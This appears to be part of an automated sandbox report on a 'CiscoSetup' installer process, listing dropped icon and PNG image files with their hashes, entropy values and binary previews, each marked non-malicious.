                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4732129504366194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                                                                                  MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                                                                                  SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                                                                                  SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                                                                                  SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                                                                                  MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                                                                                  SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                                                                                  SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                                                                                  SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                                                                                  MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                                                                                  SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                                                                                  SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                                                                                  SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                                                                                  MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                                                                                  SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                                                                                  SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                                                                                  SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                                                                                  MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                                                                                  SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                                                                                  SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                                                                                  SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                                                                                  MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                                                                                  SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                                                                                  SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                                                                                  SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                                                                                  MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                                                                                  SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                                                                                  SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                                                                                  SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                                                                                  MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                                                                                  SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                                                                                  SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                                                                                  SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                                                                                  MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                                                                                  SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                                                                                  SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                                                                                  SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                                                                                  MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                                                                                  SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                                                                                  SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                                                                                  SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
